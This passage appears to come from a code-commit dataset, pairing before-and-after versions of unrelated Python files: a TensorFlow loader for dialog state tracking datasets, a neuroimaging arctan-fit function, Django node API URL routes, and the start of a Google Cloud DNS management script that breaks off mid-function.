  """Data loader for the synthetic MultiWoZ (MultiWoZ-Synth) dataset."""

  def __init__(self, data_dir=None, **kwargs):
    super().__init__(name='multiwoz_synth', data_dir=data_dir, **kwargs)
class SGDSynthDataset(_DialogStateTrackingDataset):
  """Data loader for the synthetic Schema-Guided Dialogue (SGD-Synth) dataset."""

  def __init__(self, data_dir=None, **kwargs):
    super().__init__(name='sgd_synth', data_dir=data_dir, **kwargs)
Fix typo in dialog_state_tracking dataset
PiperOrigin-RevId: 411317014
# coding=utf-8
# Copyright 2021 The Uncertainty Baselines Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Data loader for goal-oriented dialog state tracking datasets.
Dialog state tracking is a sequence prediction task that predicts the dialog
state label of each conversational turn in a given dialog. Currently, the
following datasets are supported.
* Synthetic Task-oriented Dialog with Controllable Complexity (SimDial) [1]
* Synthetic Multi-Domain Wizard-of-Oz (MultiWoZ-Synth) [2, 4]
* Synthetic Schema-Guided Dialogue Dataset (SGD-Synth) [3]
## References
[1]: Tiancheng Zhao and Maxine Eskenazi. Zero-Shot Dialog Generation with
Cross-Domain Latent Actions. In _Meeting of the Special Interest Group on
Discourse and Dialogue_ (SIGDIAL), 2018.
https://www.aclweb.org/anthology/W18-5001/
[2]: Pawel Budzianowski et al. MultiWOZ - A Large-Scale Multi-Domain
Wizard-of-Oz Dataset for Task-Oriented Dialogue Modelling.
In _Proceedings of the 2018 Conference on Empirical Methods in Natural
Language Processing_ (EMNLP), 2018.
https://aclanthology.org/D18-1547/
[3]: Abhinav Rastogi et al. Towards Scalable Multi-Domain Conversational Agents:
The Schema-Guided Dialogue Dataset. In _Proceedings of the AAAI Conference
on Artificial Intelligence_ (AAAI), 2020.
https://arxiv.org/abs/1909.05855
[4]: Campagna, Giovanni et al. Zero-Shot Transfer Learning with Synthesized Data
for Multi-Domain Dialogue State Tracking.
In _Proceedings of the 58th Annual Meeting of the Association for
Computational Linguistics_ (ACL), 2020.
https://arxiv.org/abs/2005.00891
"""
import json
import os
from typing import Dict, Tuple, Optional, Any
import tensorflow.compat.v2 as tf
import tensorflow_datasets as tfds
from uncertainty_baselines.datasets import base
# Feature keys used both in the serialized tf.train.Examples and in the
# parsed example dict returned by the data loader.
USR_UTT_NAME = 'usr_utt'
SYS_UTT_NAME = 'sys_utt'
USR_UTT_RAW_NAME = 'usr_utt_raw'
SYS_UTT_RAW_NAME = 'sys_utt_raw'
STATE_LABEL_NAME = 'label'
DOMAIN_LABEL_NAME = 'domain_label'
DIAL_LEN_NAME = 'dialog_len'
DIAL_TURN_ID_NAME = 'dialog_turn_id'

# File names expected to exist under `data_dir` for each dataset.
FILENAME_META = 'meta.json'
FILENAME_TOKENIZER = 'id_to_vocab.json'
FILENAME_TOKENIZER_LABEL = 'id_to_vocab_label.json'
FILENAME_TOKENIZER_DOMAIN_LABEL = 'id_to_vocab_domain_label.json'
FILENAME_TRAIN = 'train.tfrecord'
FILENAME_TEST = 'test.tfrecord'

# Per-dataset constants keyed by dataset name: maximum utterance and dialog
# lengths, vocabulary sizes, and example counts per split.
MAX_UTT_LEN = dict(simdial=40, multiwoz_synth=42, sgd_synth=76)
MAX_DIALOG_LEN = dict(simdial=13, multiwoz_synth=7, sgd_synth=24)
VOCAB_SIZE_UTT = dict(simdial=474, multiwoz_synth=1506, sgd_synth=6709)
VOCAB_SIZE_LABEL = dict(simdial=52, multiwoz_synth=10, sgd_synth=39)
NUM_TRAIN = dict(simdial=6400, multiwoz_synth=7500, sgd_synth=8100)
NUM_TEST = dict(simdial=1600, multiwoz_synth=1500, sgd_synth=2700)
# Use test as stand-in for val. In practice we never use this dataset.
NUM_VAL = NUM_TEST
FILENAME_VALID = FILENAME_TEST
def _build_dataset(glob_dir: str, is_training: bool) -> tf.data.Dataset:
  """Creates a TFRecord dataset over the files matched by `glob_dir`."""
  # Shuffle the file order and read 10 files in parallel only while training;
  # evaluation reads deterministically from one file at a time.
  files = tf.data.Dataset.list_files(glob_dir, shuffle=is_training)
  return files.interleave(
      tf.data.TFRecordDataset, cycle_length=10 if is_training else 1)
def _make_features_spec(
    load_domain_label: bool) -> Dict[str, tf.io.FixedLenFeature]:
  """Specifies dataset example feature types.

  Every feature is a serialized-tensor string except the dialog length,
  which is a plain int64. The domain label is included only when
  `load_domain_label` is True.
  """

  def _string_feature() -> tf.io.FixedLenFeature:
    return tf.io.FixedLenFeature([], tf.string, default_value='')

  feature_spec = {
      key: _string_feature() for key in (
          USR_UTT_NAME, SYS_UTT_NAME, USR_UTT_RAW_NAME, SYS_UTT_RAW_NAME,
          STATE_LABEL_NAME)
  }
  feature_spec[DIAL_LEN_NAME] = tf.io.FixedLenFeature(
      [], tf.int64, default_value=0)
  if load_domain_label:
    feature_spec[DOMAIN_LABEL_NAME] = _string_feature()
  return feature_spec
def _get_num_examples_and_filenames(
    dataset_name) -> Tuple[Dict[str, int], Dict[str, str]]:
  """Retrieves the number of examples and filenames according to data mode."""
  split_counts = (('train', NUM_TRAIN), ('validation', NUM_VAL),
                  ('test', NUM_TEST))
  num_examples = {split: table[dataset_name] for split, table in split_counts}
  file_names = dict(
      train=FILENAME_TRAIN,
      validation=FILENAME_VALID,
      test=FILENAME_TEST,
      metadata=FILENAME_META)
  return num_examples, file_names
def load_json(json_dir: str) -> Dict[Any, Any]:
  """Loads and parses the JSON file at `json_dir`.

  Uses tf.io.gfile, so the path may live on any filesystem TF supports
  (local disk, GCS, etc.).
  """
  with tf.io.gfile.GFile(json_dir) as json_file:
    return json.load(json_file)
_CITATION = {
'simdial':
"""
@article{zhao2018zero,
title={Zero-Shot Dialog Generation with Cross-Domain Latent Actions},
author={Zhao, Tiancheng and Eskenazi, Maxine},
journal={arXiv preprint arXiv:1805.04803},
year={2018}
}
"""
}
_HOMEPAGE = {'simdial': 'https://github.com/snakeztc/SimDial'}
_DESCRIPTION = {
'simdial':
('Simulated goal-oriented conversations [1] generated for information '
'requests in four domains: bus, restaurant, weather, and movie.')
}
class _DialogStateTrackingDatasetBuilder(tfds.core.DatasetBuilder):
  """Minimal TFDS DatasetBuilder, does not support downloading.

  Reads pre-generated TFRecord files plus a `meta.json` metadata file from
  `data_dir`. Downloading is deliberately unsupported (see
  `_download_and_prepare`).
  """
  VERSION = tfds.core.Version('1.0.0')
  RELEASE_NOTES = {
      '1.0.0': 'Initial release.',
  }

  def __init__(self, name, data_dir, load_domain_label, **kwargs):
    # `name` selects the per-dataset constants (NUM_TRAIN, NUM_TEST, ...).
    self._data_name = name
    self._num_examples, self._file_names = _get_num_examples_and_filenames(name)
    self._file_paths = self._get_file_paths(data_dir)
    self._load_domain_label = load_domain_label
    super().__init__(data_dir=data_dir, **kwargs)
    # We have to reset self._data_dir since the parent class appends the class
    # name and version to dir name.
    self._data_dir = data_dir

  def _download_and_prepare(self, dl_manager, download_config=None):
    """Downloads and prepares dataset for reading."""
    raise NotImplementedError(
        'Must provide a data_dir with the files already downloaded to.')

  def _get_file_paths(self, data_dir) -> Dict[str, str]:
    """Returns the full path under `data_dir` for each split and metadata."""
    get_full_path = lambda name: os.path.join(data_dir, name)
    return {
        'train': get_full_path(self._file_names['train']),
        'validation': get_full_path(self._file_names['validation']),
        'test': get_full_path(self._file_names['test']),
        'metadata': get_full_path(self._file_names['metadata'])
    }

  def _as_dataset(self,
                  split: tfds.Split,
                  decoders=None,
                  read_config=None,
                  shuffle_files=False) -> tf.data.Dataset:
    """Constructs a `tf.data.Dataset` for the requested split."""
    # The tfds read options are ignored; shuffling is decided solely by
    # whether the requested split is TRAIN.
    del decoders
    del read_config
    del shuffle_files
    if split == tfds.Split.TRAIN:
      return _build_dataset(
          glob_dir=self._file_paths['train'], is_training=True)
    elif split == tfds.Split.VALIDATION:
      return _build_dataset(
          glob_dir=self._file_paths['validation'], is_training=False)
    elif split == tfds.Split.TEST:
      return _build_dataset(
          glob_dir=self._file_paths['test'], is_training=False)
    raise ValueError('Unsupported split given: {}.'.format(split))

  def _info(self) -> tfds.core.DatasetInfo:
    """Returns the `tfds.core.DatasetInfo` object."""
    metadata_dict = load_json(self._file_paths['metadata'])
    has_domain_label = metadata_dict.get('has_domain_label', False)
    features = {
        USR_UTT_NAME: tfds.features.Tensor(shape=[], dtype=tf.string),
        SYS_UTT_NAME: tfds.features.Tensor(shape=[], dtype=tf.string),
        USR_UTT_RAW_NAME: tfds.features.Tensor(shape=[], dtype=tf.string),
        SYS_UTT_RAW_NAME: tfds.features.Tensor(shape=[], dtype=tf.string),
        STATE_LABEL_NAME: tfds.features.Tensor(shape=[], dtype=tf.string),
        DIAL_LEN_NAME: tfds.features.Tensor(shape=[], dtype=tf.int64)
    }
    # Optionally, load domain labels if it exists.
    if self._load_domain_label and has_domain_label:
      features[DOMAIN_LABEL_NAME] = tfds.features.Tensor(
          shape=[], dtype=tf.string)
    elif self._load_domain_label and not has_domain_label:
      # BUG FIX: the two adjacent string literals previously concatenated to
      # "...domain labelaccording..." -- a space was missing.
      raise ValueError(
          'load_domain_label=True, but the dataset does not have domain label '
          'according to metadata ({}).'.format(self._file_paths['metadata']))
    info = tfds.core.DatasetInfo(
        builder=self,
        features=tfds.features.FeaturesDict(features),
        # Note that while metadata seems to be the most appropriate way to store
        # arbitrary info, it will not be printed when printing out the dataset
        # info.
        metadata=tfds.core.MetadataDict(**metadata_dict),
        description=_DESCRIPTION.get(self._data_name, ''),
        homepage=_HOMEPAGE.get(self._data_name, ''),
        citation=_CITATION.get(self._data_name, ''))
    # Instead of having a single element shard_lengths, we should really have a
    # list of the number of elements in each file shard in each split.
    split_infos = [
        tfds.core.SplitInfo(
            name=tfds.Split.VALIDATION,
            shard_lengths=[self._num_examples['validation']],
            num_bytes=0,
        ),
        tfds.core.SplitInfo(
            name=tfds.Split.TEST,
            shard_lengths=[self._num_examples['test']],
            num_bytes=0,
        ),
        tfds.core.SplitInfo(
            name=tfds.Split.TRAIN,
            shard_lengths=[self._num_examples['train']],
            num_bytes=0,
        ),
    ]
    split_dict = tfds.core.SplitDict(
        split_infos, dataset_name='__dialog_state_tracking_dataset_builder')
    info.set_splits(split_dict)
    return info
class _DialogStateTrackingDataset(base.BaseDataset):
  """Base data loader for the dialog state tracking datasets."""

  def __init__(self,
               name: str,
               split: str,
               load_domain_label: bool = True,
               add_dialog_turn_id: Optional[bool] = False,
               shuffle_buffer_size: Optional[int] = None,
               num_parallel_parser_calls: int = 64,
               data_dir: Optional[str] = None,
               download_data: bool = False,
               is_training: Optional[bool] = None,
               **kwargs: Any):
    """Create a dialog state tracking tf.data.Dataset builder.

    Args:
      name: the name of the dataset.
      split: a dataset split, either a custom tfds.Split or one of the
        tfds.Split enums [TRAIN, VALIDATION, TEST] or their lowercase string
        names.
      load_domain_label: Whether to load dialog domain labels as well.
        Currently only works for `SGDSynthDataset`.
      add_dialog_turn_id: Whether to add a unique id for each dialog turn.
      shuffle_buffer_size: the number of example to use in the shuffle buffer
        for tf.data.Dataset.shuffle().
      num_parallel_parser_calls: the number of parallel threads to use while
        preprocessing in tf.data.Dataset.map().
      data_dir: path to a directory containing the tfrecord datasets.
      download_data: Whether or not to download data before loading. Currently
        unsupported and ignored; files must already exist under `data_dir`.
      is_training: Whether or not the given `split` is the training split. Only
        required when the passed split is not one of ['train', 'validation',
        'test', tfds.Split.TRAIN, tfds.Split.VALIDATION, tfds.Split.TEST].
      **kwargs: optional arguments passed to base.BaseDataset.__init__.
    """
    # Load vocab for dialog utterances and state labels.
    self.load_domain_label = load_domain_label
    # Specify a unique id for a turn in a dialog.
    self.add_dialog_turn_id = add_dialog_turn_id
    self.vocab_utter = load_json(os.path.join(data_dir, FILENAME_TOKENIZER))
    self.vocab_label = load_json(
        os.path.join(data_dir, FILENAME_TOKENIZER_LABEL))
    if self.load_domain_label:
      self.vocab_domain_label = load_json(
          os.path.join(data_dir, FILENAME_TOKENIZER_DOMAIN_LABEL))
    dataset_builder = _DialogStateTrackingDatasetBuilder(
        name, data_dir, load_domain_label)
    super().__init__(
        name=name,
        dataset_builder=dataset_builder,
        split=split,
        is_training=is_training,
        shuffle_buffer_size=shuffle_buffer_size,
        num_parallel_parser_calls=num_parallel_parser_calls,
        # Downloading is unsupported by the builder, so this is hard-coded to
        # False regardless of the `download_data` argument.
        download_data=False,
        **kwargs)

  def _create_process_example_fn(self) -> base.PreProcessFn:

    def _example_parser(example: Dict[str, tf.Tensor]) -> Dict[str, tf.Tensor]:
      """Parse features and labels from a serialized tf.train.Example."""
      features_spec = _make_features_spec(self.load_domain_label)
      features = tf.io.parse_single_example(example['features'], features_spec)
      sys_utt = tf.io.parse_tensor(features[SYS_UTT_NAME], out_type=tf.int32)
      usr_utt = tf.io.parse_tensor(features[USR_UTT_NAME], out_type=tf.int32)
      sys_utt_raw = tf.io.parse_tensor(
          features[SYS_UTT_RAW_NAME], out_type=tf.string)
      usr_utt_raw = tf.io.parse_tensor(
          features[USR_UTT_RAW_NAME], out_type=tf.string)
      state_label = tf.io.parse_tensor(
          features[STATE_LABEL_NAME], out_type=tf.int32)
      dialog_len = features[DIAL_LEN_NAME]

      # Extract maximum dialog and utterance lengths.
      max_dialog_len = MAX_DIALOG_LEN[self.name]
      max_utt_len = MAX_UTT_LEN[self.name]

      # Ensure shape of parsed tensors.
      sys_utt = tf.ensure_shape(sys_utt, (max_dialog_len, max_utt_len))
      usr_utt = tf.ensure_shape(usr_utt, (max_dialog_len, max_utt_len))
      sys_utt_raw = tf.ensure_shape(sys_utt_raw, (max_dialog_len,))
      usr_utt_raw = tf.ensure_shape(usr_utt_raw, (max_dialog_len,))
      state_label = tf.ensure_shape(state_label, (max_dialog_len,))

      parsed_example = {
          SYS_UTT_NAME: sys_utt,
          USR_UTT_NAME: usr_utt,
          USR_UTT_RAW_NAME: usr_utt_raw,
          SYS_UTT_RAW_NAME: sys_utt_raw,
          STATE_LABEL_NAME: state_label,
          DIAL_LEN_NAME: dialog_len,
      }

      # Optionally, load domain labels.
      if self.load_domain_label:
        domain_label = tf.io.parse_tensor(
            features[DOMAIN_LABEL_NAME], out_type=tf.int32)
        domain_label = tf.ensure_shape(domain_label, (max_dialog_len,))
        parsed_example[DOMAIN_LABEL_NAME] = domain_label

      if self.add_dialog_turn_id:
        # Give turn t of example e the globally-unique integer id
        # e * max_dialog_len + t, derived from the example fingerprint.
        example_id = example[self._fingerprint_key]
        dialog_turn_id = tf.range(
            example_id * max_dialog_len, (example_id + 1) * max_dialog_len,
            dtype=tf.int32)
        # BUG FIX: `(max_dialog_len)` is just a parenthesized int, not the
        # intended 1-element shape tuple.
        dialog_turn_id = tf.ensure_shape(dialog_turn_id, (max_dialog_len,))
        parsed_example[DIAL_TURN_ID_NAME] = dialog_turn_id
      return parsed_example

    return _example_parser
class SimDialDataset(_DialogStateTrackingDataset):
  """Data loader for the SimDial synthetic dialog dataset."""

  def __init__(self, data_dir=None, **kwargs):
    super().__init__(name='simdial', data_dir=data_dir, **kwargs)
class MultiWoZSynthDataset(_DialogStateTrackingDataset):
  """Data loader for the synthetic MultiWoZ (MultiWoZ-Synth) dataset."""

  def __init__(self, data_dir=None, **kwargs):
    super().__init__(name='multiwoz_synth', data_dir=data_dir, **kwargs)
class SGDSynthDataset(_DialogStateTrackingDataset):
  """Data loader for the synthetic Schema-Guided Dialogue (SGD-Synth) dataset."""

  def __init__(self, data_dir=None, **kwargs):
    super().__init__(name='sgd_synth', data_dir=data_dir, **kwargs)
|
import numpy as N
def invertR(delta, IRF, niter=20, verbose=False):
    """
    If IRF has 2 components (w0, w1) return an estimate of the inverse of
    r=w1/w0, as in Liao et al. (2002). Fits a simple arctan model
    a * arctan(b * r) + c to the ratio w1/w0.

    Parameters
    ----------
    delta : array
        1D grid of delay values.
    IRF : sequence of callables
        Two-component impulse response basis (w0, w1); each maps `delta`
        to an array of the same shape.
    niter : int
        Number of nonlinear least-squares iterations.
    verbose : bool
        Unused; retained for backward compatibility.

    Returns
    -------
    theta, deltahat, ddeltahat, deltahatinv, ddeltahatinv
        Fitted parameters (a, b, c), the fitted forward map and its
        derivative, and the inverse map and its derivative. Each returned
        callable also carries the fitted a, b, c as attributes.
    """
    R = IRF[1](delta) / IRF[0](delta)

    def f(x, theta):
        a, b, c = theta
        _x = x[:, 0]
        return a * N.arctan(b * _x) + c

    def grad(x, theta):
        a, b, c = theta
        value = N.zeros((3, x.shape[0]))
        _x = x[:, 0]
        value[0] = N.arctan(b * _x)
        value[1] = a / (1. + N.power((b * _x), 2.)) * _x
        value[2] = 1.
        return value.T

    # Choose the sign of the initial intercept from the local slope of delta
    # as a function of R near the middle of the grid.
    # BUG FIX: use floor division for the midpoint -- `n / 2` is a float
    # under Python 3 (or `from __future__ import division`) and would raise
    # when used as an array index. The previous unconditional assignment to
    # `c` was dead code (overwritten in both branches) and has been removed.
    n = delta.shape[0]
    mid = n // 2
    delta0 = (delta[mid + 2] - delta[mid + 1]) / (R[mid + 2] - R[mid + 1])
    if delta0 < 0:
        c = (delta.max() / (N.pi / 2)) * 1.2
    else:
        c = -(delta.max() / (N.pi / 2)) * 1.2

    from neuroimaging.algorithms.statistics import nlsmodel
    design = R.reshape(R.shape[0], 1)
    model = nlsmodel.NLSModel(Y=delta,
                              design=design,
                              f=f,
                              grad=grad,
                              theta=N.array([4., 0.5, 0]),
                              niter=niter)
    # NLSModel drives the fit through its (old-style) iterator protocol;
    # each model.next() call performs one optimization step.
    for iteration in model:
        model.next()
    a, b, c = model.theta

    def _deltahat(r):
        return a * N.arctan(b * r) + c

    def _ddeltahat(r):
        return a * b / (1 + (b * r)**2)

    def _deltahatinv(d):
        return N.tan((d - c) / a) / b

    def _ddeltahatinv(d):
        return 1. / (a * b * N.cos((d - c) / a)**2)

    # Expose the fitted parameters on each returned callable.
    for fn in [_deltahat, _ddeltahat, _deltahatinv, _ddeltahatinv]:
        setattr(fn, 'a', a)
        setattr(fn, 'b', b)
        setattr(fn, 'c', c)

    return model.theta, _deltahat, _ddeltahat, _deltahatinv, _ddeltahatinv
remove unused verbose parameter
import numpy as N
def invertR(delta, IRF, niter=20):
    """
    If IRF has 2 components (w0, w1) return an estimate of the inverse of
    r=w1/w0, as in Liao et al. (2002). Fits a simple arctan model
    a * arctan(b * r) + c to the ratio w1/w0.

    Parameters
    ----------
    delta : array
        1D grid of delay values.
    IRF : sequence of callables
        Two-component impulse response basis (w0, w1); each maps `delta`
        to an array of the same shape.
    niter : int
        Number of nonlinear least-squares iterations.

    Returns
    -------
    theta, deltahat, ddeltahat, deltahatinv, ddeltahatinv
        Fitted parameters (a, b, c), the fitted forward map and its
        derivative, and the inverse map and its derivative. Each returned
        callable also carries the fitted a, b, c as attributes.
    """
    R = IRF[1](delta) / IRF[0](delta)

    def f(x, theta):
        a, b, c = theta
        _x = x[:, 0]
        return a * N.arctan(b * _x) + c

    def grad(x, theta):
        a, b, c = theta
        value = N.zeros((3, x.shape[0]))
        _x = x[:, 0]
        value[0] = N.arctan(b * _x)
        value[1] = a / (1. + N.power((b * _x), 2.)) * _x
        value[2] = 1.
        return value.T

    # Choose the sign of the initial intercept from the local slope of delta
    # as a function of R near the middle of the grid.
    # BUG FIX: use floor division for the midpoint -- `n / 2` is a float
    # under Python 3 (or `from __future__ import division`) and would raise
    # when used as an array index. The previous unconditional assignment to
    # `c` was dead code (overwritten in both branches) and has been removed.
    n = delta.shape[0]
    mid = n // 2
    delta0 = (delta[mid + 2] - delta[mid + 1]) / (R[mid + 2] - R[mid + 1])
    if delta0 < 0:
        c = (delta.max() / (N.pi / 2)) * 1.2
    else:
        c = -(delta.max() / (N.pi / 2)) * 1.2

    from neuroimaging.algorithms.statistics import nlsmodel
    design = R.reshape(R.shape[0], 1)
    model = nlsmodel.NLSModel(Y=delta,
                              design=design,
                              f=f,
                              grad=grad,
                              theta=N.array([4., 0.5, 0]),
                              niter=niter)
    # NLSModel drives the fit through its (old-style) iterator protocol;
    # each model.next() call performs one optimization step.
    for iteration in model:
        model.next()
    a, b, c = model.theta

    def _deltahat(r):
        return a * N.arctan(b * r) + c

    def _ddeltahat(r):
        return a * b / (1 + (b * r)**2)

    def _deltahatinv(d):
        return N.tan((d - c) / a) / b

    def _ddeltahatinv(d):
        return 1. / (a * b * N.cos((d - c) / a)**2)

    # Expose the fitted parameters on each returned callable.
    for fn in [_deltahat, _ddeltahat, _deltahatinv, _ddeltahatinv]:
        setattr(fn, 'a', a)
        setattr(fn, 'b', b)
        setattr(fn, 'c', c)

    return model.theta, _deltahat, _ddeltahat, _deltahatinv, _ddeltahatinv
|
from django.conf.urls import url
from api.nodes import views
from website import settings
# URL routes for the node API. Each route's name is taken from the view's own
# `view_name` attribute so reverse() lookups stay in sync with the view code.
urlpatterns = [
    # Examples:
    # url(r'^$', 'api.views.home', name='home'),
    # url(r'^blog/', include('blog.urls')),

    # Node collection and detail.
    url(r'^$', views.NodeList.as_view(), name=views.NodeList.view_name),
    url(r'^(?P<node_id>\w+)/$', views.NodeDetail.as_view(), name=views.NodeDetail.view_name),

    # Contributors.
    url(r'^(?P<node_id>\w+)/contributors/$', views.NodeContributorsList.as_view(), name=views.NodeContributorsList.view_name),
    url(r'^(?P<node_id>\w+)/contributors/(?P<user_id>\w+)/$', views.NodeContributorDetail.as_view(), name=views.NodeContributorDetail.view_name),

    # Node relations.
    url(r'^(?P<node_id>\w+)/children/$', views.NodeChildrenList.as_view(), name=views.NodeChildrenList.view_name),
    url(r'^(?P<node_id>\w+)/forks/$', views.NodeForksList.as_view(), name=views.NodeForksList.view_name),

    # Files: provider listing/detail, then files within a provider. The two
    # `path` patterns are disjoint: folder paths end with '/', file paths do
    # not, which routes them to the list and detail views respectively.
    url(r'^(?P<node_id>\w+)/files/$', views.NodeProvidersList.as_view(), name=views.NodeProvidersList.view_name),
    url(r'^(?P<node_id>\w+)/files/providers/(?P<provider>\w+)/?$', views.NodeProviderDetail.as_view(), name=views.NodeProviderDetail.view_name),
    url(r'^(?P<node_id>\w+)/files/(?P<provider>\w+)(?P<path>/(?:.*/)?)$', views.NodeFilesList.as_view(), name=views.NodeFilesList.view_name),
    url(r'^(?P<node_id>\w+)/files/(?P<provider>\w+)(?P<path>/.+[^/])$', views.NodeFileDetail.as_view(), name=views.NodeFileDetail.view_name),

    url(r'^(?P<node_id>\w+)/comments/$', views.NodeCommentsList.as_view(), name=views.NodeCommentsList.view_name),
    url(r'^(?P<node_id>\w+)/logs/$', views.NodeLogList.as_view(), name=views.NodeLogList.view_name),
    url(r'^(?P<node_id>\w+)/node_links/$', views.NodeLinksList.as_view(), name=views.NodeLinksList.view_name),
    url(r'^(?P<node_id>\w+)/node_links/(?P<node_link_id>\w+)/', views.NodeLinksDetail.as_view(), name=views.NodeLinksDetail.view_name),
    url(r'^(?P<node_id>\w+)/wikis/$', views.NodeWikiList.as_view(), name=views.NodeWikiList.view_name),

    # Institutions.
    url(r'^(?P<node_id>\w+)/institutions/$', views.NodeInstitutionsList.as_view(), name=views.NodeInstitutionsList.view_name),
    url(r'^(?P<node_id>\w+)/relationships/institutions/$', views.NodeInstitutionsRelationship.as_view(), name=views.NodeInstitutionsRelationship.view_name),

    # Draft registrations.
    url(r'^(?P<node_id>\w+)/draft_registrations/$', views.NodeDraftRegistrationsList.as_view(), name=views.NodeDraftRegistrationsList.view_name),
    url(r'^(?P<node_id>\w+)/draft_registrations/(?P<draft_id>\w+)/$', views.NodeDraftRegistrationDetail.as_view(), name=views.NodeDraftRegistrationDetail.view_name),
]

# Routes only active in local/staging environments
if settings.DEV_MODE:
    urlpatterns.extend([
        url(r'^(?P<node_id>\w+)/registrations/$', views.NodeRegistrationsList.as_view(), name=views.NodeRegistrationsList.view_name),
        # Custom citations
        url(r'^(?P<node_id>\w+)/citations/$', views.NodeAlternativeCitationsList.as_view(), name=views.NodeAlternativeCitationsList.view_name),
        url(r'^(?P<node_id>\w+)/citations/(?P<citation_id>\w+)/$', views.NodeAlternativeCitationDetail.as_view(), name=views.NodeAlternativeCitationDetail.view_name),
    ])
Enable node registrations endpoint
from django.conf.urls import url

from api.nodes import views
from website import settings

# URL routes for the node API. Each route's `name` is taken from the view
# class's own `view_name`, keeping reverse() lookups in sync with the views.
urlpatterns = [
    # Examples:
    # url(r'^$', 'api.views.home', name='home'),
    # url(r'^blog/', include('blog.urls')),
    url(r'^$', views.NodeList.as_view(), name=views.NodeList.view_name),
    url(r'^(?P<node_id>\w+)/$', views.NodeDetail.as_view(), name=views.NodeDetail.view_name),
    url(r'^(?P<node_id>\w+)/contributors/$', views.NodeContributorsList.as_view(), name=views.NodeContributorsList.view_name),
    url(r'^(?P<node_id>\w+)/contributors/(?P<user_id>\w+)/$', views.NodeContributorDetail.as_view(), name=views.NodeContributorDetail.view_name),
    url(r'^(?P<node_id>\w+)/children/$', views.NodeChildrenList.as_view(), name=views.NodeChildrenList.view_name),
    url(r'^(?P<node_id>\w+)/forks/$', views.NodeForksList.as_view(), name=views.NodeForksList.view_name),
    url(r'^(?P<node_id>\w+)/files/$', views.NodeProvidersList.as_view(), name=views.NodeProvidersList.view_name),
    url(r'^(?P<node_id>\w+)/files/providers/(?P<provider>\w+)/?$', views.NodeProviderDetail.as_view(), name=views.NodeProviderDetail.view_name),
    # Folder paths end with '/', file paths do not -- the two regexes below
    # dispatch on that trailing slash.
    url(r'^(?P<node_id>\w+)/files/(?P<provider>\w+)(?P<path>/(?:.*/)?)$', views.NodeFilesList.as_view(), name=views.NodeFilesList.view_name),
    url(r'^(?P<node_id>\w+)/files/(?P<provider>\w+)(?P<path>/.+[^/])$', views.NodeFileDetail.as_view(), name=views.NodeFileDetail.view_name),
    url(r'^(?P<node_id>\w+)/comments/$', views.NodeCommentsList.as_view(), name=views.NodeCommentsList.view_name),
    url(r'^(?P<node_id>\w+)/logs/$', views.NodeLogList.as_view(), name=views.NodeLogList.view_name),
    url(r'^(?P<node_id>\w+)/node_links/$', views.NodeLinksList.as_view(), name=views.NodeLinksList.view_name),
    url(r'^(?P<node_id>\w+)/node_links/(?P<node_link_id>\w+)/', views.NodeLinksDetail.as_view(), name=views.NodeLinksDetail.view_name),
    url(r'^(?P<node_id>\w+)/wikis/$', views.NodeWikiList.as_view(), name=views.NodeWikiList.view_name),
    url(r'^(?P<node_id>\w+)/institutions/$', views.NodeInstitutionsList.as_view(), name=views.NodeInstitutionsList.view_name),
    url(r'^(?P<node_id>\w+)/relationships/institutions/$', views.NodeInstitutionsRelationship.as_view(), name=views.NodeInstitutionsRelationship.view_name),
    url(r'^(?P<node_id>\w+)/registrations/$', views.NodeRegistrationsList.as_view(), name=views.NodeRegistrationsList.view_name),
    url(r'^(?P<node_id>\w+)/draft_registrations/$', views.NodeDraftRegistrationsList.as_view(), name=views.NodeDraftRegistrationsList.view_name),
    url(r'^(?P<node_id>\w+)/draft_registrations/(?P<draft_id>\w+)/$', views.NodeDraftRegistrationDetail.as_view(), name=views.NodeDraftRegistrationDetail.view_name),
]
# Routes only active in local/staging environments; guarded so they never
# ship to production URL tables.
if settings.DEV_MODE:
    urlpatterns.extend([
        # Custom citations
        url(r'^(?P<node_id>\w+)/citations/$', views.NodeAlternativeCitationsList.as_view(), name=views.NodeAlternativeCitationsList.view_name),
        url(r'^(?P<node_id>\w+)/citations/(?P<citation_id>\w+)/$', views.NodeAlternativeCitationDetail.as_view(), name=views.NodeAlternativeCitationDetail.view_name),
    ])
|
"""Google Cloud Platform DNS Tool
This is an open source tool to management domains
in Google Cloud DNS using JSON files as reference
more informations please consulte the README.md
"""
import json
import time
from argparse import ArgumentParser
# Fail fast with a helpful message if the google-cloud-dns client library
# is not installed.
try:
    from google.cloud import dns
except ImportError:
    # Bug fix: the message said "requeriments.txt"; the file is requirements.txt.
    print('please check the requirements.txt and README.md')
    exit()
def client_conn(project_id=None):
    """Open a connection to the Google Cloud DNS API.

    :param project_id: Google Cloud Platform project id; ``None`` lets the
        client library pick the environment's default project
    :returns: a ``dns.Client`` connection object
    """
    return dns.Client(project=project_id)
def check_zone(name):
    """Check whether a managed zone with the given name already exists.

    :param name: name of the zone to look for
    :returns: True if a zone with that name exists, False otherwise
    """
    client = client_conn()
    for zone in client.list_zones():
        if zone.name == name:
            return True
    # Bug fix: previously fell off the end and returned None implicitly,
    # contradicting the documented boolean contract.
    return False
def create_zone(name, dns_name, description):
    """Create a new managed zone.

    :param name: a name of the new zone
    :param dns_name: domain of this zone, don't forget final point '.'
    :param description: a description about this zone or ""
    :returns: a false if not created or true
    """
    new_zone = client_conn().zone(name=name,
                                  dns_name=dns_name,
                                  description=description)
    new_zone.create()
    return new_zone.exists()
def create_record(name, dns_name, record_name, record_type, ttl, value):
    """Create a new record in an existing zone.

    :param name: a name of zone
    :param dns_name: domain of the zone
    :param record_name: reference of the new record, for example:
                        'record_name'.zone-domain.extension
    :param record_type: type of record on DNS, for example:
                        'A', 'AAAA', 'CAA', 'CNAME', 'MX', 'NAPTR',
                        'NS', 'PTR', 'SPF', 'SRV' & 'TXT'
    :param ttl: ttl in seconds as an int (not string), e.g. 3600
    :param value: any value of record single or multiple,
                  for example: ["value"] or ["8.8.8.8", "8.8.4.4"]
    :returns: log_records with all records about this zone, or an error
              message string when the change could not be applied
    """
    client = client_conn()
    zone = client.zone(name=name, dns_name=dns_name)
    record_set = zone.resource_record_set(record_name, record_type, ttl, value)
    changes = zone.changes()
    changes.add_record_set(record_set)
    try:
        changes.create()
        # Poll until the change set has been applied server-side.
